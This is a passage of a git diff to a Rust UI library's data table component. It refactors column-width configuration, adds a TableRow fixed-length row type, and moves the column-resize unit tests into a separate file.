auto_with_table_width(width: impl Into) -> Self { + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Auto, + table_width: Some(width.into()), } - - let mut total_length_ratio = col_position; - for length in widths[col_idx + 1..].iter() { - total_length_ratio += length; - } - let cols = resize_behavior.cols(); - total_length_ratio += (cols - 1 - col_idx) as f32 * column_handle_width; - - let drag_fraction = (drag_position.x - bounds.left()) / bounds_width; - let drag_fraction = drag_fraction * total_length_ratio; - let diff = drag_fraction - col_position - column_handle_width / 2.0; - - Self::drag_column_handle(diff, col_idx, &mut widths, resize_behavior); - - self.visible_widths = widths.map(DefiniteLength::Fraction); } - fn drag_column_handle( - diff: f32, - col_idx: usize, - widths: &mut TableRow, - resize_behavior: &TableRow, - ) { - // if diff > 0.0 then go right - if diff > 0.0 { - Self::propagate_resize_diff(diff, col_idx, widths, resize_behavior, 1); - } else { - Self::propagate_resize_diff(-diff, col_idx + 1, widths, resize_behavior, -1); + /// Explicit column widths with no fixed table width. + pub fn explicit>(widths: Vec) -> Self { + let cols = widths.len(); + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Explicit( + widths + .into_iter() + .map(Into::into) + .collect::>() + .into_table_row(cols), + ), + table_width: None, } } - fn propagate_resize_diff( - diff: f32, - col_idx: usize, - widths: &mut TableRow, - resize_behavior: &TableRow, - direction: i8, - ) -> f32 { - let mut diff_remaining = diff; - if resize_behavior[col_idx].min_size().is_none() { - return diff; - } - - let step_right; - let step_left; - if direction < 0 { - step_right = 0; - step_left = 1; - } else { - step_right = 1; - step_left = 0; - } - if col_idx == 0 && direction < 0 { - return diff; - } - let mut curr_column = col_idx + step_right - step_left; - - while diff_remaining != 0.0 && curr_column < widths.cols() { - let Some(min_size) = resize_behavior[curr_column].min_size() else { - if curr_column == 0 { - break; - } - curr_column -= step_left; - curr_column += step_right; - continue; - }; - - let curr_width = widths[curr_column] - diff_remaining; - widths[curr_column] = curr_width; - - if min_size > curr_width { - diff_remaining = min_size - curr_width; - widths[curr_column] = min_size; - } else { - diff_remaining = 0.0; - break; - } - if curr_column == 0 { - break; + /// Column widths for rendering. + pub fn widths_to_render(&self, cx: &App) -> Option> { + match self { + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Auto, + .. + } => None, + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Explicit(widths), + .. + } => Some(widths.map_cloned(Length::Definite)), + ColumnWidthConfig::Redistributable { + columns_state: entity, + .. + } => Some(entity.read(cx).widths_to_render()), + } + } + + /// Table-level width. + pub fn table_width(&self) -> Option { + match self { + ColumnWidthConfig::Static { table_width, .. } + | ColumnWidthConfig::Redistributable { table_width, .. } => { + table_width.map(Length::Definite) } - curr_column -= step_left; - curr_column += step_right; } - widths[col_idx] = widths[col_idx] + (diff - diff_remaining); - - diff_remaining } -} - -pub struct TableWidths { - initial: TableRow, - current: Option>, - resizable: TableRow, -} - -impl TableWidths { - pub fn new(widths: TableRow>) -> Self { - let widths = widths.map(Into::into); - let expected_length = widths.cols(); - TableWidths { - initial: widths, - current: None, - resizable: vec![TableResizeBehavior::None; expected_length] - .into_table_row(expected_length), + /// ListHorizontalSizingBehavior for uniform_list. + pub fn list_horizontal_sizing(&self) -> ListHorizontalSizingBehavior { + match self.table_width() { + Some(_) => ListHorizontalSizingBehavior::Unconstrained, + None => ListHorizontalSizingBehavior::FitList, } } - - fn lengths(&self, cx: &App) -> TableRow { - self.current - .as_ref() - .map(|entity| entity.read(cx).visible_widths.map_cloned(Length::Definite)) - .unwrap_or_else(|| self.initial.map_cloned(Length::Definite)) - } } /// A table component @@ -725,16 +212,16 @@ pub struct Table { striped: bool, show_row_borders: bool, show_row_hover: bool, - width: Option, headers: Option>, rows: TableContents, interaction_state: Option>, - col_widths: Option, + column_width_config: ColumnWidthConfig, map_row: Option), &mut Window, &mut App) -> AnyElement>>, use_ui_font: bool, empty_table_callback: Option AnyElement>>, /// The number of columns in the table. Used to assert column numbers in `TableRow` collections cols: usize, + disable_base_cell_style: bool, } impl Table { @@ -745,17 +232,26 @@ impl Table { striped: false, show_row_borders: true, show_row_hover: true, - width: None, headers: None, rows: TableContents::Vec(Vec::new()), interaction_state: None, map_row: None, use_ui_font: true, empty_table_callback: None, - col_widths: None, + disable_base_cell_style: false, + column_width_config: ColumnWidthConfig::auto(), } } + /// Disables based styling of row cell (paddings, text ellipsis, nowrap, etc), keeping width settings + /// + /// Doesn't affect base style of header cell. + /// Doesn't remove overflow-hidden + pub fn disable_base_style(mut self) -> Self { + self.disable_base_cell_style = true; + self + } + /// Enables uniform list rendering. /// The provided function will be passed directly to the `uniform_list` element. /// Therefore, if this method is called, any calls to [`Table::row`] before or after @@ -814,10 +310,18 @@ impl Table { self } - /// Sets the width of the table. - /// Will enable horizontal scrolling if [`Self::interactable`] is also called. - pub fn width(mut self, width: impl Into) -> Self { - self.width = Some(width.into()); + /// Sets a fixed table width with auto column widths. + /// + /// This is a shorthand for `.width_config(ColumnWidthConfig::auto_with_table_width(width))`. + /// For resizable columns or explicit column widths, use [`Table::width_config`] directly. + pub fn width(mut self, width: impl Into) -> Self { + self.column_width_config = ColumnWidthConfig::auto_with_table_width(width); + self + } + + /// Sets the column width configuration for the table. + pub fn width_config(mut self, config: ColumnWidthConfig) -> Self { + self.column_width_config = config; self } @@ -825,10 +329,8 @@ impl Table { /// /// Vertical scrolling will be enabled by default if the table is taller than its container. /// - /// Horizontal scrolling will only be enabled if [`Self::width`] is also called, otherwise - /// the list will always shrink the table columns to fit their contents I.e. If [`Self::uniform_list`] - /// is used without a width and with [`Self::interactable`], the [`ListHorizontalSizingBehavior`] will - /// be set to [`ListHorizontalSizingBehavior::FitList`]. + /// Horizontal scrolling will only be enabled if a table width is set via [`ColumnWidthConfig`], + /// otherwise the list will always shrink the table columns to fit their contents. pub fn interactable(mut self, interaction_state: &Entity) -> Self { self.interaction_state = Some(interaction_state.downgrade()); self @@ -854,36 +356,6 @@ impl Table { self } - pub fn column_widths(mut self, widths: UncheckedTableRow>) -> Self { - if self.col_widths.is_none() { - self.col_widths = Some(TableWidths::new(widths.into_table_row(self.cols))); - } - self - } - - pub fn resizable_columns( - mut self, - resizable: UncheckedTableRow, - column_widths: &Entity, - cx: &mut App, - ) -> Self { - if let Some(table_widths) = self.col_widths.as_mut() { - table_widths.resizable = resizable.into_table_row(self.cols); - let column_widths = table_widths - .current - .get_or_insert_with(|| column_widths.clone()); - - column_widths.update(cx, |widths, _| { - if !widths.initialized { - widths.initialized = true; - widths.widths = table_widths.initial.clone(); - widths.visible_widths = widths.widths.clone(); - } - }) - } - self - } - pub fn no_ui_font(mut self) -> Self { self.use_ui_font = false; self @@ -973,10 +445,18 @@ pub fn render_table_row( .into_iter() .zip(column_widths.into_vec()) .map(|(cell, width)| { - base_cell_style_text(width, table_context.use_ui_font, cx) - .px_1() - .py_0p5() - .child(cell) + if table_context.disable_base_cell_style { + div() + .when_some(width, |this, width| this.w(width)) + .when(width.is_none(), |this| this.flex_1()) + .overflow_hidden() + .child(cell) + } else { + base_cell_style_text(width, table_context.use_ui_font, cx) + .px_1() + .py_0p5() + .child(cell) + } }), ); @@ -992,11 +472,7 @@ pub fn render_table_row( pub fn render_table_header( headers: TableRow, table_context: TableRenderContext, - columns_widths: Option<( - WeakEntity, - TableRow, - TableRow, - )>, + resize_info: Option, entity_id: Option, cx: &mut App, ) -> impl IntoElement { @@ -1017,9 +493,7 @@ pub fn render_table_header( .flex() .flex_row() .items_center() - .justify_between() .w_full() - .p_2() .border_b_1() .border_color(cx.theme().colors().border) .children( @@ -1030,34 +504,30 @@ pub fn render_table_header( .zip(column_widths.into_vec()) .map(|((header_idx, h), width)| { base_cell_style_text(width, table_context.use_ui_font, cx) + .px_1() + .py_0p5() .child(h) .id(ElementId::NamedInteger( shared_element_id.clone(), header_idx as u64, )) - .when_some( - columns_widths.as_ref().cloned(), - |this, (column_widths, resizables, initial_sizes)| { - if resizables[header_idx].is_resizable() { - this.on_click(move |event, window, cx| { - if event.click_count() > 1 { - column_widths - .update(cx, |column, _| { - column.on_double_click( - header_idx, - &initial_sizes, - &resizables, - window, - ); - }) - .ok(); - } - }) - } else { - this - } - }, - ) + .when_some(resize_info.as_ref().cloned(), |this, info| { + if info.resize_behavior[header_idx].is_resizable() { + this.on_click(move |event, window, cx| { + if event.click_count() > 1 { + info.columns_state + .update(cx, |column, _| { + column.reset_column_to_initial_width( + header_idx, window, + ); + }) + .ok(); + } + }) + } else { + this + } + }) }), ) } @@ -1071,6 +541,7 @@ pub struct TableRenderContext { pub column_widths: Option>, pub map_row: Option), &mut Window, &mut App) -> AnyElement>>, pub use_ui_font: bool, + pub disable_base_cell_style: bool, } impl TableRenderContext { @@ -1080,9 +551,23 @@ impl TableRenderContext { show_row_borders: table.show_row_borders, show_row_hover: table.show_row_hover, total_row_count: table.rows.len(), - column_widths: table.col_widths.as_ref().map(|widths| widths.lengths(cx)), + column_widths: table.column_width_config.widths_to_render(cx), map_row: table.map_row.clone(), use_ui_font: table.use_ui_font, + disable_base_cell_style: table.disable_base_cell_style, + } + } + + pub fn for_column_widths(column_widths: Option>, use_ui_font: bool) -> Self { + Self { + striped: false, + show_row_borders: true, + show_row_hover: true, + total_row_count: 0, + column_widths, + map_row: None, + use_ui_font, + disable_base_cell_style: false, } } } @@ -1091,73 +576,58 @@ impl RenderOnce for Table { fn render(mut self, window: &mut Window, cx: &mut App) -> impl IntoElement { let table_context = TableRenderContext::new(&self, cx); let interaction_state = self.interaction_state.and_then(|state| state.upgrade()); - let current_widths = self - .col_widths - .as_ref() - .and_then(|widths| Some((widths.current.as_ref()?, widths.resizable.clone()))) - .map(|(curr, resize_behavior)| (curr.downgrade(), resize_behavior)); - - let current_widths_with_initial_sizes = self - .col_widths - .as_ref() - .and_then(|widths| { - Some(( - widths.current.as_ref()?, - widths.resizable.clone(), - widths.initial.clone(), - )) - }) - .map(|(curr, resize_behavior, initial)| (curr.downgrade(), resize_behavior, initial)); - let width = self.width; + let header_resize_info = + interaction_state + .as_ref() + .and_then(|_| match &self.column_width_config { + ColumnWidthConfig::Redistributable { columns_state, .. } => { + Some(HeaderResizeInfo::from_state(columns_state, cx)) + } + _ => None, + }); + + let table_width = self.column_width_config.table_width(); + let horizontal_sizing = self.column_width_config.list_horizontal_sizing(); let no_rows_rendered = self.rows.is_empty(); + // Extract redistributable entity for drag/drop/prepaint handlers + let redistributable_entity = + interaction_state + .as_ref() + .and_then(|_| match &self.column_width_config { + ColumnWidthConfig::Redistributable { + columns_state: entity, + .. + } => Some(entity.clone()), + _ => None, + }); + + let resize_handles = + interaction_state + .as_ref() + .and_then(|_| match &self.column_width_config { + ColumnWidthConfig::Redistributable { columns_state, .. } => Some( + render_redistributable_columns_resize_handles(columns_state, window, cx), + ), + _ => None, + }); + let table = div() - .when_some(width, |this, width| this.w(width)) + .when_some(table_width, |this, width| this.w(width)) .h_full() .v_flex() .when_some(self.headers.take(), |this, headers| { this.child(render_table_header( headers, table_context.clone(), - current_widths_with_initial_sizes, + header_resize_info, interaction_state.as_ref().map(Entity::entity_id), cx, )) }) - .when_some(current_widths, { - |this, (widths, resize_behavior)| { - this.on_drag_move::({ - let widths = widths.clone(); - move |e, window, cx| { - widths - .update(cx, |widths, cx| { - widths.on_drag_move(e, &resize_behavior, window, cx); - }) - .ok(); - } - }) - .on_children_prepainted({ - let widths = widths.clone(); - move |bounds, _, cx| { - widths - .update(cx, |widths, _| { - // This works because all children x axis bounds are the same - widths.cached_bounds_width = - bounds[0].right() - bounds[0].left(); - }) - .ok(); - } - }) - .on_drop::(move |_, _, cx| { - widths - .update(cx, |widths, _| { - widths.widths = widths.visible_widths.clone(); - }) - .ok(); - // Finish the resize operation - }) - } + .when_some(redistributable_entity, |this, widths| { + bind_redistributable_columns(this, widths) }) .child({ let content = div() @@ -1207,11 +677,7 @@ impl RenderOnce for Table { .size_full() .flex_grow() .with_sizing_behavior(ListSizingBehavior::Auto) - .with_horizontal_sizing_behavior(if width.is_some() { - ListHorizontalSizingBehavior::Unconstrained - } else { - ListHorizontalSizingBehavior::FitList - }) + .with_horizontal_sizing_behavior(horizontal_sizing) .when_some( interaction_state.as_ref(), |this, state| { @@ -1241,25 +707,7 @@ impl RenderOnce for Table { .with_sizing_behavior(ListSizingBehavior::Auto), ), }) - .when_some( - self.col_widths.as_ref().zip(interaction_state.as_ref()), - |parent, (table_widths, state)| { - parent.child(state.update(cx, |state, cx| { - let resizable_columns = &table_widths.resizable; - let column_widths = table_widths.lengths(cx); - let columns = table_widths.current.clone(); - let initial_sizes = &table_widths.initial; - state.render_resize_handles( - &column_widths, - resizable_columns, - initial_sizes, - columns, - window, - cx, - ) - })) - }, - ); + .when_some(resize_handles, |parent, handles| parent.child(handles)); if let Some(state) = interaction_state.as_ref() { let scrollbars = state @@ -1416,330 +864,3 @@ impl Component for Table { ) } } - -#[cfg(test)] -mod test { - use super::*; - - fn is_almost_eq(a: &[f32], b: &[f32]) -> bool { - a.len() == b.len() && a.iter().zip(b).all(|(x, y)| (x - y).abs() < 1e-6) - } - - fn cols_to_str(cols: &[f32], total_size: f32) -> String { - cols.iter() - .map(|f| "*".repeat(f32::round(f * total_size) as usize)) - .collect::>() - .join("|") - } - - fn parse_resize_behavior( - input: &str, - total_size: f32, - expected_cols: usize, - ) -> Vec { - let mut resize_behavior = Vec::with_capacity(expected_cols); - for col in input.split('|') { - if col.starts_with('X') || col.is_empty() { - resize_behavior.push(TableResizeBehavior::None); - } else if col.starts_with('*') { - resize_behavior.push(TableResizeBehavior::MinSize(col.len() as f32 / total_size)); - } else { - panic!("invalid test input: unrecognized resize behavior: {}", col); - } - } - - if resize_behavior.len() != expected_cols { - panic!( - "invalid test input: expected {} columns, got {}", - expected_cols, - resize_behavior.len() - ); - } - resize_behavior - } - - mod reset_column_size { - use super::*; - - fn parse(input: &str) -> (Vec, f32, Option) { - let mut widths = Vec::new(); - let mut column_index = None; - for (index, col) in input.split('|').enumerate() { - widths.push(col.len() as f32); - if col.starts_with('X') { - column_index = Some(index); - } - } - - for w in &widths { - assert!(w.is_finite(), "incorrect number of columns"); - } - let total = widths.iter().sum::(); - for width in &mut widths { - *width /= total; - } - (widths, total, column_index) - } - - #[track_caller] - fn check_reset_size( - initial_sizes: &str, - widths: &str, - expected: &str, - resize_behavior: &str, - ) { - let (initial_sizes, total_1, None) = parse(initial_sizes) else { - panic!("invalid test input: initial sizes should not be marked"); - }; - let (widths, total_2, Some(column_index)) = parse(widths) else { - panic!("invalid test input: widths should be marked"); - }; - assert_eq!( - total_1, total_2, - "invalid test input: total width not the same {total_1}, {total_2}" - ); - let (expected, total_3, None) = parse(expected) else { - panic!("invalid test input: expected should not be marked: {expected:?}"); - }; - assert_eq!( - total_2, total_3, - "invalid test input: total width not the same" - ); - let cols = initial_sizes.len(); - let resize_behavior_vec = parse_resize_behavior(resize_behavior, total_1, cols); - let resize_behavior = TableRow::from_vec(resize_behavior_vec, cols); - let result = TableColumnWidths::reset_to_initial_size( - column_index, - TableRow::from_vec(widths, cols), - TableRow::from_vec(initial_sizes, cols), - &resize_behavior, - ); - let result_slice = result.as_slice(); - let is_eq = is_almost_eq(result_slice, &expected); - if !is_eq { - let result_str = cols_to_str(result_slice, total_1); - let expected_str = cols_to_str(&expected, total_1); - panic!( - "resize failed\ncomputed: {result_str}\nexpected: {expected_str}\n\ncomputed values: {result_slice:?}\nexpected values: {expected:?}\n:minimum widths: {resize_behavior:?}" - ); - } - } - - macro_rules! check_reset_size { - (columns: $cols:expr, starting: $initial:expr, snapshot: $current:expr, expected: $expected:expr, resizing: $resizing:expr $(,)?) => { - check_reset_size($initial, $current, $expected, $resizing); - }; - ($name:ident, columns: $cols:expr, starting: $initial:expr, snapshot: $current:expr, expected: $expected:expr, minimums: $resizing:expr $(,)?) => { - #[test] - fn $name() { - check_reset_size($initial, $current, $expected, $resizing); - } - }; - } - - check_reset_size!( - basic_right, - columns: 5, - starting: "**|**|**|**|**", - snapshot: "**|**|X|***|**", - expected: "**|**|**|**|**", - minimums: "X|*|*|*|*", - ); - - check_reset_size!( - basic_left, - columns: 5, - starting: "**|**|**|**|**", - snapshot: "**|**|***|X|**", - expected: "**|**|**|**|**", - minimums: "X|*|*|*|**", - ); - - check_reset_size!( - squashed_left_reset_col2, - columns: 6, - starting: "*|***|**|**|****|*", - snapshot: "*|*|X|*|*|********", - expected: "*|*|**|*|*|*******", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - grow_cascading_right, - columns: 6, - starting: "*|***|****|**|***|*", - snapshot: "*|***|X|**|**|*****", - expected: "*|***|****|*|*|****", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - squashed_right_reset_col4, - columns: 6, - starting: "*|***|**|**|****|*", - snapshot: "*|********|*|*|X|*", - expected: "*|*****|*|*|****|*", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - reset_col6_right, - columns: 6, - starting: "*|***|**|***|***|**", - snapshot: "*|***|**|***|**|XXX", - expected: "*|***|**|***|***|**", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - reset_col6_left, - columns: 6, - starting: "*|***|**|***|***|**", - snapshot: "*|***|**|***|****|X", - expected: "*|***|**|***|***|**", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - last_column_grow_cascading, - columns: 6, - starting: "*|***|**|**|**|***", - snapshot: "*|*******|*|**|*|X", - expected: "*|******|*|*|*|***", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - goes_left_when_left_has_extreme_diff, - columns: 6, - starting: "*|***|****|**|**|***", - snapshot: "*|********|X|*|**|**", - expected: "*|*****|****|*|**|**", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - basic_shrink_right, - columns: 6, - starting: "**|**|**|**|**|**", - snapshot: "**|**|XXX|*|**|**", - expected: "**|**|**|**|**|**", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - shrink_should_go_left, - columns: 6, - starting: "*|***|**|*|*|*", - snapshot: "*|*|XXX|**|*|*", - expected: "*|**|**|**|*|*", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - shrink_should_go_right, - columns: 6, - starting: "*|***|**|**|**|*", - snapshot: "*|****|XXX|*|*|*", - expected: "*|****|**|**|*|*", - minimums: "X|*|*|*|*|*", - ); - } - - mod drag_handle { - use super::*; - - fn parse(input: &str) -> (Vec, f32, Option) { - let mut widths = Vec::new(); - let column_index = input.replace("*", "").find("I"); - for col in input.replace("I", "|").split('|') { - widths.push(col.len() as f32); - } - - for w in &widths { - assert!(w.is_finite(), "incorrect number of columns"); - } - let total = widths.iter().sum::(); - for width in &mut widths { - *width /= total; - } - (widths, total, column_index) - } - - #[track_caller] - fn check(distance: i32, widths: &str, expected: &str, resize_behavior: &str) { - let (widths, total_1, Some(column_index)) = parse(widths) else { - panic!("invalid test input: widths should be marked"); - }; - let (expected, total_2, None) = parse(expected) else { - panic!("invalid test input: expected should not be marked: {expected:?}"); - }; - assert_eq!( - total_1, total_2, - "invalid test input: total width not the same" - ); - let cols = widths.len(); - let resize_behavior_vec = parse_resize_behavior(resize_behavior, total_1, cols); - let resize_behavior = TableRow::from_vec(resize_behavior_vec, cols); - - let distance = distance as f32 / total_1; - - let mut widths_table_row = TableRow::from_vec(widths, cols); - TableColumnWidths::drag_column_handle( - distance, - column_index, - &mut widths_table_row, - &resize_behavior, - ); - - let result_widths = widths_table_row.as_slice(); - let is_eq = is_almost_eq(result_widths, &expected); - if !is_eq { - let result_str = cols_to_str(result_widths, total_1); - let expected_str = cols_to_str(&expected, total_1); - panic!( - "resize failed\ncomputed: {result_str}\nexpected: {expected_str}\n\ncomputed values: {result_widths:?}\nexpected values: {expected:?}\n:minimum widths: {resize_behavior:?}" - ); - } - } - - macro_rules! check { - (columns: $cols:expr, distance: $dist:expr, snapshot: $current:expr, expected: $expected:expr, resizing: $resizing:expr $(,)?) => { - check($dist, $current, $expected, $resizing); - }; - ($name:ident, columns: $cols:expr, distance: $dist:expr, snapshot: $current:expr, expected: $expected:expr, minimums: $resizing:expr $(,)?) => { - #[test] - fn $name() { - check($dist, $current, $expected, $resizing); - } - }; - } - - check!( - basic_right_drag, - columns: 3, - distance: 1, - snapshot: "**|**I**", - expected: "**|***|*", - minimums: "X|*|*", - ); - - check!( - drag_left_against_mins, - columns: 5, - distance: -1, - snapshot: "*|*|*|*I*******", - expected: "*|*|*|*|*******", - minimums: "X|*|*|*|*", - ); - - check!( - drag_left, - columns: 5, - distance: -2, - snapshot: "*|*|*|*****I***", - expected: "*|*|*|***|*****", - minimums: "X|*|*|*|*", - ); - } -} diff --git a/crates/ui/src/components/data_table/table_row.rs b/crates/ui/src/components/data_table/table_row.rs new file mode 100644 index 0000000000000000000000000000000000000000..9ef75e4cbbb72755294ae5c34724a55fbc40f8b8 --- /dev/null +++ b/crates/ui/src/components/data_table/table_row.rs @@ -0,0 +1,208 @@ +//! A newtype for a table row that enforces a fixed column count at runtime. +//! +//! This type ensures that all rows in a table have the same width, preventing accidental creation or mutation of rows with inconsistent lengths. +//! It is especially useful for CSV or tabular data where rectangular invariants must be maintained, but the number of columns is only known at runtime. +//! By using `TableRow`, we gain stronger guarantees and safer APIs compared to a bare `Vec`, without requiring const generics. + +use std::{ + any::type_name, + ops::{ + Index, IndexMut, Range, RangeFrom, RangeFull, RangeInclusive, RangeTo, RangeToInclusive, + }, +}; + +#[derive(Clone, Debug, PartialEq, Eq)] +pub struct TableRow(Vec); + +impl TableRow { + pub fn from_element(element: T, length: usize) -> Self + where + T: Clone, + { + Self::from_vec(vec![element; length], length) + } + + /// Constructs a `TableRow` from a `Vec`, panicking if the length does not match `expected_length`. + /// + /// Use this when you want to ensure at construction time that the row has the correct number of columns. + /// This enforces the rectangular invariant for table data, preventing accidental creation of malformed rows. + /// + /// # Panics + /// Panics if `data.len() != expected_length`. + pub fn from_vec(data: Vec, expected_length: usize) -> Self { + Self::try_from_vec(data, expected_length).unwrap_or_else(|e| { + let name = type_name::>(); + panic!("Expected {name} to be created successfully: {e}"); + }) + } + + /// Attempts to construct a `TableRow` from a `Vec`, returning an error if the length does not match `expected_len`. + /// + /// This is a fallible alternative to `from_vec`, allowing you to handle inconsistent row lengths gracefully. + /// Returns `Ok(TableRow)` if the length matches, or an `Err` with a descriptive message otherwise. + pub fn try_from_vec(data: Vec, expected_len: usize) -> Result { + if data.len() != expected_len { + Err(format!( + "Row length {} does not match expected {}", + data.len(), + expected_len + )) + } else { + Ok(Self(data)) + } + } + + /// Returns reference to element by column index. + /// + /// # Panics + /// Panics if `col` is out of bounds (i.e., `col >= self.cols()`). + pub fn expect_get(&self, col: impl Into) -> &T { + let col = col.into(); + self.0.get(col).unwrap_or_else(|| { + panic!( + "Expected table row of `{}` to have {col:?}", + type_name::() + ) + }) + } + + pub fn get(&self, col: impl Into) -> Option<&T> { + self.0.get(col.into()) + } + + pub fn as_slice(&self) -> &[T] { + &self.0 + } + + pub fn into_vec(self) -> Vec { + self.0 + } + + /// Like [`map`], but borrows the row and clones each element before mapping. + /// + /// This is useful when you want to map over a borrowed row without consuming it, + /// but your mapping function requires ownership of each element. + /// + /// # Difference + /// - `map_cloned` takes `&self`, clones each element, and applies `f(T) -> U`. + /// - [`map`] takes `self` by value and applies `f(T) -> U` directly, consuming the row. + /// - [`map_ref`] takes `&self` and applies `f(&T) -> U` to references of each element. + pub fn map_cloned(&self, f: F) -> TableRow + where + F: FnMut(T) -> U, + T: Clone, + { + self.clone().map(f) + } + + /// Consumes the row and transforms all elements within it in a length-safe way. + /// + /// # Difference + /// - `map` takes ownership of the row (`self`) and applies `f(T) -> U` to each element. + /// - Use this when you want to transform and consume the row in one step. + /// - See also [`map_cloned`] (for mapping over a borrowed row with cloning) and [`map_ref`] (for mapping over references). + pub fn map(self, f: F) -> TableRow + where + F: FnMut(T) -> U, + { + TableRow(self.0.into_iter().map(f).collect()) + } + + /// Borrows the row and transforms all elements by reference in a length-safe way. + /// + /// # Difference + /// - `map_ref` takes `&self` and applies `f(&T) -> U` to each element by reference. + /// - Use this when you want to map over a borrowed row without cloning or consuming it. + /// - See also [`map`] (for consuming the row) and [`map_cloned`] (for mapping with cloning). + pub fn map_ref(&self, f: F) -> TableRow + where + F: FnMut(&T) -> U, + { + TableRow(self.0.iter().map(f).collect()) + } + + /// Number of columns (alias to `len()` with more semantic meaning) + pub fn cols(&self) -> usize { + self.0.len() + } +} + +///// Convenience traits ///// +pub trait IntoTableRow { + fn into_table_row(self, expected_length: usize) -> TableRow; +} +impl IntoTableRow for Vec { + fn into_table_row(self, expected_length: usize) -> TableRow { + TableRow::from_vec(self, expected_length) + } +} + +// Index implementations for convenient access +impl Index for TableRow { + type Output = T; + + fn index(&self, index: usize) -> &Self::Output { + &self.0[index] + } +} + +impl IndexMut for TableRow { + fn index_mut(&mut self, index: usize) -> &mut Self::Output { + &mut self.0[index] + } +} + +// Range indexing implementations for slice operations +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: Range) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: RangeFrom) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: RangeTo) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: RangeToInclusive) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl Index for TableRow { + type Output = [T]; + + fn index(&self, index: RangeFull) -> &Self::Output { + as Index>::index(&self.0, index) + } +} + +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: RangeInclusive) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl IndexMut> for TableRow { + fn index_mut(&mut self, index: RangeInclusive) -> &mut Self::Output { + as IndexMut>>::index_mut(&mut self.0, index) + } +} diff --git a/crates/ui/src/components/data_table/tests.rs b/crates/ui/src/components/data_table/tests.rs new file mode 100644 index 0000000000000000000000000000000000000000..604e8b7cd1aabee85b406ec99d458c949eda599b --- /dev/null +++ b/crates/ui/src/components/data_table/tests.rs @@ -0,0 +1,319 @@ +use super::table_row::TableRow; +use crate::{RedistributableColumnsState, TableResizeBehavior}; + +fn is_almost_eq(a: &[f32], b: &[f32]) -> bool { + a.len() == b.len() && a.iter().zip(b).all(|(x, y)| (x - y).abs() < 1e-6) +} + +fn cols_to_str(cols: &[f32], total_size: f32) -> String { + cols.iter() + .map(|f| "*".repeat(f32::round(f * total_size) as usize)) + .collect::>() + .join("|") +} + +fn parse_resize_behavior( + input: &str, + total_size: f32, + expected_cols: usize, +) -> Vec { + let mut resize_behavior = Vec::with_capacity(expected_cols); + for col in input.split('|') { + if col.starts_with('X') || col.is_empty() { + resize_behavior.push(TableResizeBehavior::None); + } else if col.starts_with('*') { + resize_behavior.push(TableResizeBehavior::MinSize(col.len() as f32 / total_size)); + } else { + panic!("invalid test input: unrecognized resize behavior: {}", col); + } + } + + if resize_behavior.len() != expected_cols { + panic!( + "invalid test input: expected {} columns, got {}", + expected_cols, + resize_behavior.len() + ); + } + resize_behavior +} + +mod reset_column_size { + use super::*; + + fn parse(input: &str) -> (Vec, f32, Option) { + let mut widths = Vec::new(); + let mut column_index = None; + for (index, col) in input.split('|').enumerate() { + widths.push(col.len() as f32); + if col.starts_with('X') { + column_index = Some(index); + } + } + + for w in &widths { + assert!(w.is_finite(), "incorrect number of columns"); + } + let total = widths.iter().sum::(); + for width in &mut widths { + *width /= total; + } + (widths, total, column_index) + } + + #[track_caller] + fn check_reset_size(initial_sizes: &str, widths: &str, expected: &str, resize_behavior: &str) { + let (initial_sizes, total_1, None) = parse(initial_sizes) else { + panic!("invalid test input: initial sizes should not be marked"); + }; + let (widths, total_2, Some(column_index)) = parse(widths) else { + panic!("invalid test input: widths should be marked"); + }; + assert_eq!( + total_1, total_2, + "invalid test input: total width not the same {total_1}, {total_2}" + ); + let (expected, total_3, None) = parse(expected) else { + panic!("invalid test input: expected should not be marked: {expected:?}"); + }; + assert_eq!( + total_2, total_3, + "invalid test input: total width not the same" + ); + let cols = initial_sizes.len(); + let resize_behavior_vec = parse_resize_behavior(resize_behavior, total_1, cols); + let resize_behavior = TableRow::from_vec(resize_behavior_vec, cols); + let result = RedistributableColumnsState::reset_to_initial_size( + column_index, + TableRow::from_vec(widths, cols), + TableRow::from_vec(initial_sizes, cols), + &resize_behavior, + ); + let result_slice = result.as_slice(); + let is_eq = is_almost_eq(result_slice, &expected); + if !is_eq { + let result_str = cols_to_str(result_slice, total_1); + let expected_str = cols_to_str(&expected, total_1); + panic!( + "resize failed\ncomputed: {result_str}\nexpected: {expected_str}\n\ncomputed values: {result_slice:?}\nexpected values: {expected:?}\n:minimum widths: {resize_behavior:?}" + ); + } + } + + macro_rules! check_reset_size { + (columns: $cols:expr, starting: $initial:expr, snapshot: $current:expr, expected: $expected:expr, resizing: $resizing:expr $(,)?) => { + check_reset_size($initial, $current, $expected, $resizing); + }; + ($name:ident, columns: $cols:expr, starting: $initial:expr, snapshot: $current:expr, expected: $expected:expr, minimums: $resizing:expr $(,)?) => { + #[test] + fn $name() { + check_reset_size($initial, $current, $expected, $resizing); + } + }; + } + + check_reset_size!( + basic_right, + columns: 5, + starting: "**|**|**|**|**", + snapshot: "**|**|X|***|**", + expected: "**|**|**|**|**", + minimums: "X|*|*|*|*", + ); + + check_reset_size!( + basic_left, + columns: 5, + starting: "**|**|**|**|**", + snapshot: "**|**|***|X|**", + expected: "**|**|**|**|**", + minimums: "X|*|*|*|**", + ); + + check_reset_size!( + squashed_left_reset_col2, + columns: 6, + starting: "*|***|**|**|****|*", + snapshot: 